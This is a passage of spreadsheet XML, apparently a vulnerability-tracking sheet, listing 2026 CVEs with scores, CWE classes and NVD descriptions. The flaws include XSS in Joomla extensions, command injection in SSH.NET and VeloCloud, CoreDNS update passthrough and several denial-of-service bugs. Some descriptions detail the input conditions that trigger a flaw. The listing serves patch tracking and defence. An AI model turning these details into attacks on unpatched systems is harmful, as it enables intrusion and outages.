    <row r="647">
      <c r="A647" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B647" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84997</t>
        </is>
      </c>
      <c r="D647" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E647" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F647" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G647" s="5" t="inlineStr"/>
      <c r="H647" s="5" t="inlineStr"/>
      <c r="I647" s="5" t="inlineStr"/>
      <c r="J647" s="5" t="inlineStr"/>
      <c r="K647" s="5" t="inlineStr"/>
      <c r="L647" s="5" t="inlineStr"/>
      <c r="M647" s="5" t="inlineStr"/>
      <c r="N647" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O647" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P647" s="5" t="inlineStr"/>
      <c r="Q647" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R647" s="5" t="inlineStr">
        <is>
          <t>react/http is an event-driven, streaming HTTP client and server implementation for ReactPHP. From 0.6.0 until 1.11.1, React\Http\Io\ChunkedDecoder could enter an infinite loop while processing a malformed Transfer-Encoding: chunked body because handleData required its buffer to shrink on every iteration. An incomplete terminal-chunk trailer without CRLF left the buffer unchanged after strpos returned false, and exactly two non-CRLF bytes after a completed non-terminal chunk bypassed both the error and wait guards. The affected decoder processes request bodies for React\Http\HttpServer and response bodies for React\Http\Browser, allowing a malicious client to freeze a server or a malicious or compromised server to freeze a client. A reverse proxy that normalizes inbound requests may protect the server direction but does not protect outbound Browser requests. This issue is fixed in version 1.11.1.</t>
        </is>
      </c>
      <c r="S647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84997</t>
        </is>
      </c>
    </row>
    <row r="648">
      <c r="A648" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B648" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85189</t>
        </is>
      </c>
      <c r="D648" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E648" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F648" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G648" s="5" t="inlineStr"/>
      <c r="H648" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I648" s="5" t="inlineStr"/>
      <c r="J648" s="5" t="inlineStr"/>
      <c r="K648" s="5" t="inlineStr"/>
      <c r="L648" s="5" t="inlineStr"/>
      <c r="M648" s="5" t="inlineStr"/>
      <c r="N648" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O648" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P648" s="5" t="inlineStr"/>
      <c r="Q648" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R648" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via executable URL schemes in Modals extension for Joomla &lt; 17.0.0 - Modals treats a destination using an executable browser URL scheme as an ordinary modal URL. The value can reach both the generated link and the iframe-loading path. Authored content can consequently become JavaScript in a visitor's browser without using Modals' separate Pro JavaScript Events feature.</t>
        </is>
      </c>
      <c r="S648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85189</t>
        </is>
      </c>
    </row>
    <row r="649">
      <c r="A649" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B649" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85190</t>
        </is>
      </c>
      <c r="D649" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E649" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F649" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G649" s="5" t="inlineStr"/>
      <c r="H649" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I649" s="5" t="inlineStr"/>
      <c r="J649" s="5" t="inlineStr"/>
      <c r="K649" s="5" t="inlineStr"/>
      <c r="L649" s="5" t="inlineStr"/>
      <c r="M649" s="5" t="inlineStr"/>
      <c r="N649" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O649" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P649" s="5" t="inlineStr"/>
      <c r="Q649" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R649" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via class option in Quick Index extension for Joomla &lt; 5.0.5 - Quick Index inserts configurable class values into generated HTML without escaping them for an HTML attribute. A crafted value can close the intended class attribute and introduce a new attribute. Joomla's content filter cannot reliably prevent this because Quick Index creates the executable HTML after the authored plugin syntax was filtered.</t>
        </is>
      </c>
      <c r="S649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85190</t>
        </is>
      </c>
    </row>
    <row r="650">
      <c r="A650" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B650" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85191</t>
        </is>
      </c>
      <c r="D650" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E650" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F650" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G650" s="5" t="inlineStr"/>
      <c r="H650" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I650" s="5" t="inlineStr"/>
      <c r="J650" s="5" t="inlineStr"/>
      <c r="K650" s="5" t="inlineStr"/>
      <c r="L650" s="5" t="inlineStr"/>
      <c r="M650" s="5" t="inlineStr"/>
      <c r="N650" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O650" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P650" s="5" t="inlineStr"/>
      <c r="Q650" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R650" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via rtla-alias option in Tabs &amp; Accordions extension for Joomla &lt; 3.1.0 - Tabs &amp; Accordions rewrites links matching an item alias into calls to its browser API. The affected renderer places the alias inside a quoted JavaScript argument in an HTML onclick attribute without securing both the JavaScript-string and HTML-attribute contexts. A crafted data-rlta-alias value can therefore change the generated handler.</t>
        </is>
      </c>
      <c r="S650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85191</t>
        </is>
      </c>
    </row>
    <row r="651">
      <c r="A651" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B651" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85195</t>
        </is>
      </c>
      <c r="D651" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E651" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F651" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G651" s="5" t="inlineStr"/>
      <c r="H651" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I651" s="5" t="inlineStr"/>
      <c r="J651" s="5" t="inlineStr"/>
      <c r="K651" s="5" t="inlineStr"/>
      <c r="L651" s="5" t="inlineStr"/>
      <c r="M651" s="5" t="inlineStr"/>
      <c r="N651" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O651" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P651" s="5" t="inlineStr"/>
      <c r="Q651" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R651" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via link option in Articles Anywhere extension for Joomla &lt; 20.0.0 - Articles Anywhere accepts link options such as onclick and onmouseover. In affected versions, those options become real HTML event attributes without checking the article author's trust level. The plugin syntax survives Joomla's normal Author content filter because the executable HTML is generated later.</t>
        </is>
      </c>
      <c r="S651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85195</t>
        </is>
      </c>
    </row>
    <row r="652">
      <c r="A652" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B652" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85756</t>
        </is>
      </c>
      <c r="D652" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E652" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F652" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G652" s="5" t="inlineStr"/>
      <c r="H652" s="5" t="inlineStr"/>
      <c r="I652" s="5" t="inlineStr"/>
      <c r="J652" s="5" t="inlineStr"/>
      <c r="K652" s="5" t="inlineStr"/>
      <c r="L652" s="5" t="inlineStr"/>
      <c r="M652" s="5" t="inlineStr"/>
      <c r="N652" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O652" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P652" s="5" t="inlineStr"/>
      <c r="Q652" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R652" s="5" t="inlineStr">
        <is>
          <t>SSH.NET is a Secure Shell (SSH) library for .NET. Prior to 2026.0.0, ScpClient places caller-supplied remote paths into the command used to run scp on the server, and the default RemotePathTransformation.DoubleQuote transformation cannot safely quote every remote command interpreter. When an application passes an attacker-controlled path to a shell-based server, shell metacharacters not neutralized by the active IRemotePathTransformation can execute commands as the authenticated SSH user. Exploitation requires a shell-based server and a path crafted for that shell's parsing rules; non-shell servers and paths fully neutralized by the selected transformation are not affected. RemotePathTransformation.ShellQuote is available for POSIX shells, while SftpClient avoids a remote shell entirely. This issue is fixed in version 2026.0.0.</t>
        </is>
      </c>
      <c r="S652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85756</t>
        </is>
      </c>
    </row>
    <row r="653">
      <c r="A653" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B653" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D653" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E653" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F653" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G653" s="5" t="inlineStr"/>
      <c r="H653" s="5" t="inlineStr"/>
      <c r="I653" s="5" t="inlineStr"/>
      <c r="J653" s="5" t="inlineStr"/>
      <c r="K653" s="5" t="inlineStr"/>
      <c r="L653" s="5" t="inlineStr"/>
      <c r="M653" s="5" t="inlineStr"/>
      <c r="N653" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O653" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P653" s="5" t="inlineStr"/>
      <c r="Q653" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="R653" s="5" t="inlineStr">
        <is>
          <t>CoreDNS is a DNS server written in Go. Prior to 1.14.7, the DNS-over-HTTPS, DNS-over-HTTP/3, DNS-over-QUIC, and DNS-over-gRPC listeners in plugin/pkg/doh/doh.go, core/dnsserver/server_quic.go, and core/dnsserver/server_grpc.go call dns.Msg.Unpack without the dns.DefaultMsgAcceptFunc request policy used by UDP, TCP, and DNS-over-TLS. An unauthenticated client can send an RFC 2136 UPDATE that the proxy or forward plugin passes unchanged to an update-capable upstream. If that upstream trusts CoreDNS's source address or connection and does not require an attacker-unknown end-to-end TSIG, the request appears to originate from CoreDNS and can add, replace, or delete DNS records, redirect traffic, take over names, alter mail routing, or disrupt the writable zone. This issue is fixed in version 1.14.7.</t>
        </is>
      </c>
      <c r="S653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="654">
      <c r="A654" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B654" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D654" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E654" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F654" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G654" s="5" t="inlineStr"/>
      <c r="H654" s="5" t="inlineStr"/>
      <c r="I654" s="5" t="inlineStr"/>
      <c r="J654" s="5" t="inlineStr"/>
      <c r="K654" s="5" t="inlineStr"/>
      <c r="L654" s="5" t="inlineStr"/>
      <c r="M654" s="5" t="inlineStr"/>
      <c r="N654" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O654" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P654" s="5" t="inlineStr"/>
      <c r="Q654" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R654" s="5" t="inlineStr">
        <is>
          <t>Skipper is an HTTP router and reverse proxy for service composition. Prior to version 0.27.37, the opaAuthorizeRequestWithBody filter can authorize an oversized request after Skipper truncates the body presented to Open Policy Agent because the input.truncated_body signal is derived from Content-Length rather than the actual read result. In filters/openpolicyagent/openpolicyagent.go, ExtractHttpBodyOptionally truncates bodies at maxBodyBytes, while filters/openpolicyagent/internal/envoy/skipperadapter.go copies the request headers without adding a Content-Length value that reflects the truncation. For an HTTP/1.1 request using Transfer-Encoding: chunked or an HTTP/2 request without Content-Length, a body-inspecting policy that follows the prior mitigation and permits input.truncated_body equal to false can evaluate only the truncated prefix, allow the request, and then forward the full oversized body to the protected upstream. This residual issue is distinct from CVE-2026-50197. This issue is fixed in version 0.27.37.</t>
        </is>
      </c>
      <c r="S654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="655">
      <c r="A655" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B655" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86108</t>
        </is>
      </c>
      <c r="D655" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E655" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F655" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G655" s="5" t="inlineStr"/>
      <c r="H655" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I655" s="5" t="inlineStr"/>
      <c r="J655" s="5" t="inlineStr"/>
      <c r="K655" s="5" t="inlineStr"/>
      <c r="L655" s="5" t="inlineStr"/>
      <c r="M655" s="5" t="inlineStr"/>
      <c r="N655" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O655" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P655" s="5" t="inlineStr"/>
      <c r="Q655" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R655" s="5" t="inlineStr">
        <is>
          <t>Insufficient validation of inputs supplied through affected VeloCloud Edge management and configuration workflows may allow an authorized management request or configuration value to be interpreted as an operating-system command. Successful exploitation may allow command execution with elevated privileges on the affected VeloCloud Edge.</t>
        </is>
      </c>
      <c r="S655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86108</t>
        </is>
      </c>
    </row>
    <row r="656">
      <c r="A656" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B656" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86109</t>
        </is>
      </c>
      <c r="D656" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E656" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F656" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G656" s="5" t="inlineStr"/>
      <c r="H656" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I656" s="5" t="inlineStr"/>
      <c r="J656" s="5" t="inlineStr"/>
      <c r="K656" s="5" t="inlineStr"/>
      <c r="L656" s="5" t="inlineStr"/>
      <c r="M656" s="5" t="inlineStr"/>
      <c r="N656" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O656" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P656" s="5" t="inlineStr"/>
      <c r="Q656" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R656" s="5" t="inlineStr">
        <is>
          <t>The VeloCloud Edge software update workflow may accept update bundles without properly validating their signatures because the workflow does not restrict the digest algorithm used for artifact verification. An attacker with either sufficient privileges to upload packages to VeloCloud Orchestrator or credentials permitting direct access to an Edge may be able to install unauthorized software.</t>
        </is>
      </c>
      <c r="S656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86109</t>
        </is>
      </c>
    </row>
    <row r="657">
      <c r="A657" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B657" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86894</t>
        </is>
      </c>
      <c r="D657" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E657" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F657" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G657" s="5" t="inlineStr"/>
      <c r="H657" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I657" s="5" t="inlineStr"/>
      <c r="J657" s="5" t="inlineStr"/>
      <c r="K657" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L657" s="5" t="inlineStr"/>
      <c r="M657" s="5" t="inlineStr"/>
      <c r="N657" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O657" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P657" s="5" t="inlineStr"/>
      <c r="Q657" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R657" s="5" t="inlineStr">
        <is>
          <t>A logic issue was addressed with improved checks. This issue is fixed in macOS Golden Gate 27. An app may be able to break out of its sandbox.</t>
        </is>
      </c>
      <c r="S657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86894</t>
        </is>
      </c>
    </row>
    <row r="658">
      <c r="A658" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B658" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86895</t>
        </is>
      </c>
      <c r="D658" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E658" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F658" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G658" s="5" t="inlineStr"/>
      <c r="H658" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I658" s="5" t="inlineStr"/>
      <c r="J658" s="5" t="inlineStr"/>
      <c r="K658" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L658" s="5" t="inlineStr"/>
      <c r="M658" s="5" t="inlineStr"/>
      <c r="N658" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O658" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P658" s="5" t="inlineStr"/>
      <c r="Q658" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R658" s="5" t="inlineStr">
        <is>
          <t>An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 27 and iPadOS 27, tvOS 27, visionOS 27, watchOS 27. A local app may be able to read a persistent account identifier.</t>
        </is>
      </c>
      <c r="S658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86895</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86904</t>
        </is>
      </c>
      <c r="D659" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:watchos</t>
        </is>
      </c>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr"/>
      <c r="Q659" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="R659" s="5" t="inlineStr">
        <is>
          <t>A privacy issue was addressed with improved state management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, watchOS 27. An app may be able to track users across apps and websites without permission.</t>
        </is>
      </c>
      <c r="S659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86904</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87776</t>
        </is>
      </c>
      <c r="D660" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr"/>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr"/>
      <c r="Q660" s="5" t="inlineStr">
        <is>
          <t>CWE-401, CWE-459</t>
        </is>
      </c>
      <c r="R660" s="5" t="inlineStr">
        <is>
          <t>compression is a Node.js and Express compression middleware. In versions before 1.8.2, when a client aborts the connection while a compressed response is still being sent, the zlib stream created to compress that response is never destroyed, so each aborted compressed response leaks its native zlib memory. A remote unauthenticated attacker can repeatedly open requests and disconnect early, exhausting the available memory and crashing the server. All applications using compression are affected. The issue is fixed in compression 1.8.2, and users should upgrade to 1.8.2 or later.</t>
        </is>
      </c>
      <c r="S660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87776</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D661" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr">
        <is>
          <t>gitpython_project:gitpython</t>
        </is>
      </c>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr"/>
      <c r="Q661" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="R661" s="5" t="inlineStr">
        <is>
          <t>GitPython before 3.1.60 contains a regular expression denial of service vulnerability in Actor.name_email_regex that processes commit author and committer fields. Attackers can craft a commit object with a malformed author field containing an unterminated angle bracket to cause quadratic backtracking, exhausting CPU resources for over two minutes per commit access.</t>
        </is>
      </c>
      <c r="S661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87908</t>
        </is>
      </c>
      <c r="D662" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>ce714d77-add3-4f53-aff5-83d477b104bb</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr"/>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr"/>
      <c r="Q662" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="R662" s="5" t="inlineStr">
        <is>
